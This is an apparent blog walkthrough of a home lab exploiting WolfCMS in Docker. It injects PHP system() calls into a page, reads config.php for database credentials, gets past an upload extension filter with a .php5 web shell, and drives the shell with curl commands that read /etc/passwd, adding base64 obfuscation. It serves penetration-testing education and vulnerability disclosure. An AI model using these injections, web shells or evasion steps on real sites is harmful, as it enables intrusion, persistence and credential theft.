Previous Posts that can assist with this Walkthrough
1. Billu_b0x - Highlights a Local File Inclusion vulnerability
2. Seattle - Highlights Brute Forcing a Login and XSS
3. Zico2 - Highlights directory traversal and PHP Command Injection
4. Docker with WolfCMS and MySQL Images - Prerequisite for this post...
Tools Used:
VMware Workstation 12 Player
PuTTY or SSH client on host computer
Kali Linux Distro VM (Downloaded the VM edition from kali.org)
1 - docker
2 - docker image called wolfcms/wolfcms
3 - docker image called mysql
4 - Create a MySQL user and Set a password for MySQL user
Disclosure of Vulnerabilities listed below. I disclosed the below vulnerabilities to WolfCMS on November 4, 2017 and November 13, 2017. I have received no response from them.
Lab
1. After loading the docker images from the last post for MySQL and WolfCMS the configuration for the WolfCMS was retained however the MySQL configuration and information was not retained.
2. Follow the previous lab to setup MySQL or find a different image so that when you commit the changes they are retained. You can pull down an ubuntu image and run "apt-get update; apt-get install net-tools mysql-server zip wget"
3. After you login as the admin from the URL http://172.17.0.2/?/admin/login you should see the following page. For now we are going to work with the "About Us" page.
4. Knowing from the setup of the web page that this is programmed in PHP, we are going to try and get PHP code to execute in the body of this "About Us" page.
String: <?php echo "test"; ?>
5. Notice that the "About Us" page interprets the PHP and returns the word "test". Sweet!
6. I am going to try running system commands and capture the output and display to the "About Us" page. The system command should be disabled.
Strings:
<?php
echo "\n\nLocal Info\n\n";
echo '<pre>';
system('pwd');
system('whoami');
system('ls -lha');
echo '</pre>';
?>
7. Wow! That worked to pull back the present working directory (pwd), the user the web server is running as, and the directory listing of the active directory. We can execute shell commands through PHP as long as the www-data user has access to do so.
8. Normally in a configuration file you can find a username and password to the database. Let's try and get the contents of the config.php file. Let's add a command to cat the config.php file.
String: system('cat /var/www/html/wolfcms/config.php');
9. Looking at the "About Us" page to see the output of the information, shows that it probably did not work.
10. Let's check the source of the page, by right-clicking on the page and clicking, "view source". Notice that the config.php is actually visible. We can see quickly that the database username and password are displayed.
12. And the results are...
13. Let's not look inside of the user table, but first lets display the columns of the table.
14. And the results of the fields in the table user...
17. Now with the above vulnerabilities you have full access to run any command you like on the file system with the permissions of the www-data user and full access to the database. Remember, with PHP code execution you can insert and update records.
18. Really quick, stored XSS exists on this page also.
19. The above vulnerabilities allow us to execute operating system commands, steal cookies with stored XSS, query the database and much more. However, to understand attackers, if the database does not contain information that they can sell they are looking for a way to be persistent to use the site in other ways. One way they gain persistence is through a web shell. This allows you to execute commands and gather results. For this first exercise we are going to upload a simple web shell. Navigate to the file manager.
20. On Kali, under the directory of /usr/share/webshells/php is a file called simple-backdoor.php. If you read about this latest update, you see that PHP file extensions were blocked from being uploaded. If you attempt to upload simple-backdoor.php if will fail and not complete. Sometimes as a penetration tester you need to look at the source code.
In the source code, you can see that the extensions that are blocked are .php, .php3, .php4, and .inc. However, as you identify other extensions that it could be you could find that .php5 is not blocked. You can copy the simple-backdoor.php file to now become simple-backdoor.php5 and then the upload will succeed.
Command: cp /usr/share/webshells/php/simple-backdoor.php /usr/share/webshells/php/simple-backdoor.php5
21. Before you uploaded the simple-backdoor.php5 file you should look at the source code and understand what it is going to do. If you navigate to the file that you uploaded you will see the following in the browser.
23. Remember that if you pass parameters in the URL, the parameters will appear in the logs. I am going to modify the the backdoor script to be read a POST parameter. I copied it to be sb-post.php5 and then uploaded it.
24. Now if you browse to the page you will not see anything showing in the page. I am going to use curl to conduct a POST request with the command that I would like to execute.
Command: curl -d "cmd=ls" -X POST http://172.17.0.2/public/sb-post.php5
25. With the above backdoor I can return the output of the commands that I would like to execute. Remember that you can chain commands together also.
Command: curl -d "cmd=whoami;ls -lha;cat /etc/passwd" -X POST http://172.17.0.2/public/sb-post.php5
26. With the backdoor you can see that the commands are in plain-text. You may want to find a way to obfuscate or make it difficult for the string to be identified. Malware and backdoors often use encryption to hide commands sent and received. I am going to use Base64 Encoding to pass the commands to the web shell. First let's modify the web shell to add the decoding of a base64 encoded string.
27. Now, using bash to encode the command that we want sent, then using curl to send it, we receive the results.
28. Granted you probably want the output encoded as you receive it back from the web server.
Challenge: Change the output to be base64 encoded.
Challenge: Write a python script that will read as input the command, base64_encode it, send it, receive the results, and decode it. After this process read as input another command.
No comments:
Post a Comment